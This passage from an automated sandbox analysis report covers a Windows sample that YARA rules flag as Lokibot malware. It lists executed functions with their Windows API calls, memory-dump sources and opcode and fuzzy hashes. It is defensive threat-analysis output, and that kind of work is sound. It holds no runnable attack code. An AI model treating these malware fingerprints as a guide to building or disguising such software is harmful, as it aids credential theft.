                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.489824103.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.450013817.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.488133602.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            Chronological Activities

                                            Disassembly

                                            Code Analysis

                                            Reset < >

                                              Analysis Process: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 7108 Parent PID: 5832 SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCOMMON

                                              Executed Functions

                                              Function 07AC4BA2, Relevance: .5, Instructions: 473COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 034d15d052c367e68a6da97dbb2c68f14ab33922f246caa539e255b077115e18
                                              • Instruction ID: 43d45b86b58e187a7c06b2f4403f2625458cf8aedfc0cc8b2147107b080b77cd
                                              • Opcode Fuzzy Hash: 034d15d052c367e68a6da97dbb2c68f14ab33922f246caa539e255b077115e18
                                              • Instruction Fuzzy Hash: 9C22E2B4915258DFDB64DF64C858BECBBB1BF4A304F208199D419AB361CB70AE85CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017BB681, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 017BB6F0
                                              • GetCurrentThread.KERNEL32 ref: 017BB72D
                                              • GetCurrentProcess.KERNEL32 ref: 017BB76A
                                              • GetCurrentThreadId.KERNEL32 ref: 017BB7C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 7fb4d70b69028441e4398169b2d253a2bd5ba2f53adb3a16c9266e56f844f872
                                              • Instruction ID: 709b626f7c6bd3eaed8673a34022889238a650f4a607cbc1466939a43f36cc62
                                              • Opcode Fuzzy Hash: 7fb4d70b69028441e4398169b2d253a2bd5ba2f53adb3a16c9266e56f844f872
                                              • Instruction Fuzzy Hash: 855154B49046488FDB14CFA9D588BDEFBF1FF48314F24846AE519A7250C774A888CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017BB690, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 017BB6F0
                                              • GetCurrentThread.KERNEL32 ref: 017BB72D
                                              • GetCurrentProcess.KERNEL32 ref: 017BB76A
                                              • GetCurrentThreadId.KERNEL32 ref: 017BB7C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 10c161236580c7579b04dd3c6767e75aa1a1511c8552bddc54d60b17f31f89da
                                              • Instruction ID: fdca4f975e55dc3965340f96880980ff480044802c04b1760b10b614d497ac01
                                              • Opcode Fuzzy Hash: 10c161236580c7579b04dd3c6767e75aa1a1511c8552bddc54d60b17f31f89da
                                              • Instruction Fuzzy Hash: 955153B49046488FEB14CFA9D588BDEFBF0EF48314F24846AE519A7250D774A888CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC8F92, Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: )9H$r&'
                                              • API String ID: 0-4283692356
                                              • Opcode ID: b0c1c3cdc223af56bd1218ec9d294f3351119ba0070ebf86224dc034923b5606
                                              • Instruction ID: 13e1b48bc24a2576b9d59dc7373e8c562e65428c216575b0fa6bb6491b9dc878
                                              • Opcode Fuzzy Hash: b0c1c3cdc223af56bd1218ec9d294f3351119ba0070ebf86224dc034923b5606
                                              • Instruction Fuzzy Hash: DB5168B9E00219DFCB04CFA9D8409EEBBB2FF89310F10856AD415AB754DB35AD46CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017B9690, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 017B98D6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 7db5d508229258835cd18d191a4a050c0bc79ac699e244971fe79b4af622850c
                                              • Instruction ID: e0239cc40035c41413f1f034d98461c1bbbae42211e9dfe28648f444e7684314
                                              • Opcode Fuzzy Hash: 7db5d508229258835cd18d191a4a050c0bc79ac699e244971fe79b4af622850c
                                              • Instruction Fuzzy Hash: B27133B0A00B058FD764DF2AD184B9AFBF5FF88218F008929D65AD7B44DB34E9458F91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017BFCEC, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017BFE0A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: 6f606cd194bd9614aeb37ae028597a956e2a2a24d0b179cbc8232cc246dc9247
                                              • Instruction ID: 73bec4b789bdb10141798b99bf18b1714bbe75fe2863cd6d182dbb1d31d06c29
                                              • Opcode Fuzzy Hash: 6f606cd194bd9614aeb37ae028597a956e2a2a24d0b179cbc8232cc246dc9247
                                              • Instruction Fuzzy Hash: EF51CFB1D00309DFDB14CFA9C984ADEFBB5BF48710F24812AE819AB214D7749985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017BFCF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017BFE0A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: f5514632e83abbbedb30f76c78f17c242e1c979cec0c666e1e7bee808bf445c2
                                              • Instruction ID: 0373abdab6d2a3aaca1ad6e6ec7ab9732838e5fc063903f2837ef932fce8847a
                                              • Opcode Fuzzy Hash: f5514632e83abbbedb30f76c78f17c242e1c979cec0c666e1e7bee808bf445c2
                                              • Instruction Fuzzy Hash: 9E41CFB1D003099FDB14CFA9C984ADEFFB5BF48714F24822AE819AB214D7749985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017B38A8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 017B5421
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 686b45687bc7aa3e736508e9aeffcd8b97bd1bb49961d95606b55e0fb578552a
                                              • Instruction ID: 0d823334f7dc07520f6b4f62e02344dacf17504a3241aa9161ca3a10984d1708
                                              • Opcode Fuzzy Hash: 686b45687bc7aa3e736508e9aeffcd8b97bd1bb49961d95606b55e0fb578552a
                                              • Instruction Fuzzy Hash: A641CF70D0465CCEDB25CFA9C984BCEFBB5BF49308F248069D508AB251DBB96985CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017B536E, Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 017B5421
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 46e6572ff5cd6befec8002760f08d2a5179170cdc8989fe889d46707ebf438a6
                                              • Instruction ID: 34adfe2a83bc637bf20f82a9064e4ce26e50c7653bfba341dc66fd13313184f7
                                              • Opcode Fuzzy Hash: 46e6572ff5cd6befec8002760f08d2a5179170cdc8989fe889d46707ebf438a6
                                              • Instruction Fuzzy Hash: 6E41E270D04618CFDB24CFA9C984BCEFBB1BF48308F248069D508AB255DB755986CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017B8192, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemMetrics.USER32(0000004B), ref: 017B8205
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: MetricsSystem
                                              • String ID:
                                              • API String ID: 4116985748-0
                                              • Opcode ID: 05127df86c44a64ab9f940d84b00943e0c88859d67fb23f873dc0d9861401885
                                              • Instruction ID: 827991c466cceeb56e51177e039b9a38c1c76c7e237b4fac00265ac07448df1a
                                              • Opcode Fuzzy Hash: 05127df86c44a64ab9f940d84b00943e0c88859d67fb23f873dc0d9861401885
                                              • Instruction Fuzzy Hash: 5E312571906384CFEB21DF69D4883EABFF8EB54354F18806DD444A3285C7389985CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017BB8B2, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017BB93F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: e8066fe91bc420e0e23c70791ee0188e658906ad64c4534f59da82873634fa34
                                              • Instruction ID: 0174a8e70530b71c79ba1f24d242064be766934fc51d13fa4633d0c258eb31fb
                                              • Opcode Fuzzy Hash: e8066fe91bc420e0e23c70791ee0188e658906ad64c4534f59da82873634fa34
                                              • Instruction Fuzzy Hash: 7C21DFB5905219EFDB10CFA9D984AEEBBF4FB48320F14842AE954A3210D374A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017BB8B8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017BB93F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: c997a7caa71d2ee6f30a54ae910ae6d4fc7bb7a1e7041961a39083a7ac8a6237
                                              • Instruction ID: 1aa458ad48a2fb2b5579c65cce9a0290c191d77509056c82639306faba842a5c
                                              • Opcode Fuzzy Hash: c997a7caa71d2ee6f30a54ae910ae6d4fc7bb7a1e7041961a39083a7ac8a6237
                                              • Instruction Fuzzy Hash: 6621E2B59042099FDB10CFA9D984BDEFBF8FB48320F14841AE914A3310D374A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017B92A8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,017B9951,00000800,00000000,00000000), ref: 017B9B62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 9137b3099708b30ddf75564edc7259c48b6a2d2b5b2e31014c060f666459efa8
                                              • Instruction ID: 039ef34ea3f509385b1852df90048c89ad5c1e818941a80acf86cc632eee0306
                                              • Opcode Fuzzy Hash: 9137b3099708b30ddf75564edc7259c48b6a2d2b5b2e31014c060f666459efa8
                                              • Instruction Fuzzy Hash: C91114B69043498FDB10CF9AC584BDEFBF4EB48314F10852AEA25A7200C374A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017B9AF0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,017B9951,00000800,00000000,00000000), ref: 017B9B62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 9bd78f557d2a7cb1178f4de530658cf4ff78df25c53b1458bc2707087bf82a6b
                                              • Instruction ID: caf7e3028afd946ccd734ecec2c11f9af23835de9a1c217370b29f3202d1d1a7
                                              • Opcode Fuzzy Hash: 9bd78f557d2a7cb1178f4de530658cf4ff78df25c53b1458bc2707087bf82a6b
                                              • Instruction Fuzzy Hash: 6F21F2B69002098FDB10CFAAC484BEEFBB4EB88314F14852AD929A7200C374A545CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017BFF38, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowLongW.USER32(?,?,?), ref: 017BFF9D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: LongWindow
                                              • String ID:
                                              • API String ID: 1378638983-0
                                              • Opcode ID: de266bd45e898d18e5a4c5df33b1c091248d414754e38d6fb5597fcf7706a1d6
                                              • Instruction ID: 1936b606ebbaa6fe63d7bba5028ce11f50ad657271da134e9b248358b81d99bb
                                              • Opcode Fuzzy Hash: de266bd45e898d18e5a4c5df33b1c091248d414754e38d6fb5597fcf7706a1d6
                                              • Instruction Fuzzy Hash: 5411F2B58043099FDB10DF99D989BDEFBF8EB49724F20845AE954A3340C374A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017B9870, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 017B98D6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 13ae85114c90b6e6290a13328e9abd601fd68c6048c272da6729590a78ca5966
                                              • Instruction ID: 96e6669538246848f4c7c29422e837c05e6a30fcf1d27e40e1f65f31ea04527d
                                              • Opcode Fuzzy Hash: 13ae85114c90b6e6290a13328e9abd601fd68c6048c272da6729590a78ca5966
                                              • Instruction Fuzzy Hash: AD11D2B5C006498FDB10CF9AD444BDEFBF4EB89324F14852AD929B7600D375A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017BFF40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowLongW.USER32(?,?,?), ref: 017BFF9D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: LongWindow
                                              • String ID:
                                              • API String ID: 1378638983-0
                                              • Opcode ID: f8208fdbbc711c00a742c650df94e9b3b0790267a4e5b5757b8f10de514b164f
                                              • Instruction ID: 3c67e196681be57c0b45a96f5e8e68663879d199d779ad2720e50f5988644d65
                                              • Opcode Fuzzy Hash: f8208fdbbc711c00a742c650df94e9b3b0790267a4e5b5757b8f10de514b164f
                                              • Instruction Fuzzy Hash: 3611E2B58042499FDB20CF99D988BDEFBF8EB49724F20851AE955A7340C374A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC5FC3, Relevance: .3, Instructions: 277COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 569268a6ad9a11f5ca25a53f5f476da5d7f0c95ac3dd72c306ef270c50e8fa9b
                                              • Instruction ID: df28109336c5c7755c3e1a138e6dde72d52a58663b43e5c0f7b03b241441745c
                                              • Opcode Fuzzy Hash: 569268a6ad9a11f5ca25a53f5f476da5d7f0c95ac3dd72c306ef270c50e8fa9b
                                              • Instruction Fuzzy Hash: C2C148F4805205DFDB00DF55C588AADBBFAFF8A318F199158E414AB266C779E884CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC6018, Relevance: .3, Instructions: 265COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c54733d26dd4881293285387eac566a9a1f2f913e906121e769eddeaa35f7b8
                                              • Instruction ID: fe647d9ab82ab497c3799404fe2116ed79fd8cae15302d85814ccb03e9f7c967
                                              • Opcode Fuzzy Hash: 5c54733d26dd4881293285387eac566a9a1f2f913e906121e769eddeaa35f7b8
                                              • Instruction Fuzzy Hash: CDC148F4805205DFDB00DF55C588AADBBFAFF8A318F199198D4146B266C77AE884CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC6028, Relevance: .3, Instructions: 264COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9d2340919773272cfe52e2e0bfe627e0dc1c9ad60fbf9ff0a9d05075424551e
                                              • Instruction ID: f046f2a21ebce7afece79b6723fc4cee72edec1341daed96d1e3ccd9372a3a19
                                              • Opcode Fuzzy Hash: b9d2340919773272cfe52e2e0bfe627e0dc1c9ad60fbf9ff0a9d05075424551e
                                              • Instruction Fuzzy Hash: D0C138B4805105DFDB00DF55C588AADBBF6FF8A318F159098D4146B266C776E884CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC6047, Relevance: .3, Instructions: 263COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 54ed57ecc8b52d205d3fda23b8f27763020a7b9fdbfe92517455bedccb53347f
                                              • Instruction ID: dcd9e9cfddb296078cdd6b52cd8521a3147b37fb0278b4504b2c2df9473bbcc7
                                              • Opcode Fuzzy Hash: 54ed57ecc8b52d205d3fda23b8f27763020a7b9fdbfe92517455bedccb53347f
                                              • Instruction Fuzzy Hash: BCC137F4805205DFDB00DF95C588AADBBF6FF8A318F159098D414AB266C77AE884CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC7914, Relevance: .3, Instructions: 253COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4618498dc5b0d2767f274b3446779f586ee41550035fbc3638aee5e509e8d258
                                              • Instruction ID: 56ea95d51c94d6555091c1c6ac55ebc7034c3cdb58bab256f65a95ef16a13c52
                                              • Opcode Fuzzy Hash: 4618498dc5b0d2767f274b3446779f586ee41550035fbc3638aee5e509e8d258
                                              • Instruction Fuzzy Hash: 74A12AB8A15209EFCB04CFA9D4809ADBBF6BF49310F649159E826EB345D730E942CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC0D07, Relevance: .2, Instructions: 172COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7907cb199db82def2bdfea74da49335a37438c7507a6e13e031d6f9a98dd3f59
                                              • Instruction ID: d3c9f9ec0742545d6fe963b295253a80f33de83bc47950554649c694e3f70408
                                              • Opcode Fuzzy Hash: 7907cb199db82def2bdfea74da49335a37438c7507a6e13e031d6f9a98dd3f59
                                              • Instruction Fuzzy Hash: D3613AB1A00649DFCB14DFA9C854A9EBBF1FF89310F11816DE559AB364DB70AD81CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC0D18, Relevance: .2, Instructions: 167COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8069a4775d77071e93acd9fa0e84908c228fd540136e3cc83c0a55d463f76f4
                                              • Instruction ID: 76b76206b3cc50624361cbc21ac26fb56f15d23ef635680d09b8742e48392ada
                                              • Opcode Fuzzy Hash: b8069a4775d77071e93acd9fa0e84908c228fd540136e3cc83c0a55d463f76f4
                                              • Instruction Fuzzy Hash: 5A611AB5A00609DFCB14DFA9C854A9EBBF1FF88314F118169E519AB360DB71AD81CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC5641, Relevance: .2, Instructions: 165COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 438f8bef5fdc463a12ea5377b2abb00d92b7a74d1ecee4133eb769f236aa6e21
                                              • Instruction ID: 34220ad51cf4402572e2ff7bc1275b51e8869fbf4cdc9750ea046e2475bb4a10
                                              • Opcode Fuzzy Hash: 438f8bef5fdc463a12ea5377b2abb00d92b7a74d1ecee4133eb769f236aa6e21
                                              • Instruction Fuzzy Hash: 0B5149B0D19209EFDF04CFA9C444BEDBBF5BB8A310F249429E025A3241C3746AA5CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC0054, Relevance: .2, Instructions: 162COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0d7d1232701762299e1fcd5cd3d9d6ce4d01b53161d56c645f36aac58051a01b
                                              • Instruction ID: 83ccec73eefd48a769d1ab9962fc8a1fa94330f1db8d4085f662a574a5013ec8
                                              • Opcode Fuzzy Hash: 0d7d1232701762299e1fcd5cd3d9d6ce4d01b53161d56c645f36aac58051a01b
                                              • Instruction Fuzzy Hash: B2511470B042469FCB00DB799C448AFBBF6EFC5224B15856AE529DB350EF30DD0187A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC2C41, Relevance: .2, Instructions: 161COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 17aa694ce6788859f47c4c92122a0dfc297e729879e0e68a74a60a74c4f0a7d2
                                              • Instruction ID: 3890756468d56e937cb5de543c06b1d0596868ccfae69c56e5c248d711ebed6b
                                              • Opcode Fuzzy Hash: 17aa694ce6788859f47c4c92122a0dfc297e729879e0e68a74a60a74c4f0a7d2
                                              • Instruction Fuzzy Hash: 7051D3B1A18245EFCB04CB69D4447BEBBF2FF59310F14856AE066EB282C734E941CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC2C50, Relevance: .2, Instructions: 157COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 193647e7055f6ed7c1a4bf6b5011a4f6c7e4679098cbb84be6999168b37d7e22
                                              • Instruction ID: c857133ff0809bb56960e2e76d5eee52664fb75d7f6bb856ce50bcb3d9697208
                                              • Opcode Fuzzy Hash: 193647e7055f6ed7c1a4bf6b5011a4f6c7e4679098cbb84be6999168b37d7e22
                                              • Instruction Fuzzy Hash: 885192B0A18155EFCB04DB69D4447BEBBF2FF59310F10852AE066EB285C634E941CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC1E00, Relevance: .2, Instructions: 153COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 93ac3034afba9269e43239dbf693a3e6102ec8a34d6527b410db987073190ba6
                                              • Instruction ID: 9dd8b5c163a4f60fcf1d0d8d9df52b07bd5a83b2c2808408865d7675bfaa639e
                                              • Opcode Fuzzy Hash: 93ac3034afba9269e43239dbf693a3e6102ec8a34d6527b410db987073190ba6
                                              • Instruction Fuzzy Hash: 0741B5B5B002499FCB10DFA9C4446EFBBFAEFC8214F14842EDA15E7344DB3499458BA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC733F, Relevance: .1, Instructions: 134COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 244660ad9d0dc90c6d122f017f1058bcd2890817171f1e35b3544a9504c9aad2
                                              • Instruction ID: f7ce226a7f1ce18cea7ac0f69a7009cb344bfb678bc4752f69f2cf06e863209b
                                              • Opcode Fuzzy Hash: 244660ad9d0dc90c6d122f017f1058bcd2890817171f1e35b3544a9504c9aad2
                                              • Instruction Fuzzy Hash: 5C5106B4D1920AEBCB04CF99C5809EDFBB9FF4A300F119559D829BB251D730A946CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC0304, Relevance: .1, Instructions: 110COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 460a079999b2c95e0fef32b649e5968c475f8e10d432c301cf63a73791777fda
                                              • Instruction ID: 706f046224175340517d4df52fe2316f8de07bb941b6ecbb8ea75fd26fc0b2a0
                                              • Opcode Fuzzy Hash: 460a079999b2c95e0fef32b649e5968c475f8e10d432c301cf63a73791777fda
                                              • Instruction Fuzzy Hash: 14412BB1D1474A9BCB10DFA9C8446EEFBF4FF89310F10852AD569B7600E770A585CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC6D61, Relevance: .1, Instructions: 101COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d72cddf0ded68d0523c819e59e457e235266e1adcfd67e120acfb1a1e0c998d
                                              • Instruction ID: a2994cdbbba5b49d4ea48189cfb1aa1a2db9f7f329a10a62b8525f06a05c76c4
                                              • Opcode Fuzzy Hash: 5d72cddf0ded68d0523c819e59e457e235266e1adcfd67e120acfb1a1e0c998d
                                              • Instruction Fuzzy Hash: A23107B2C16149AFC705DBA8E9442DDFFF0FF46221B5047ABC415AB216D7300A15CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

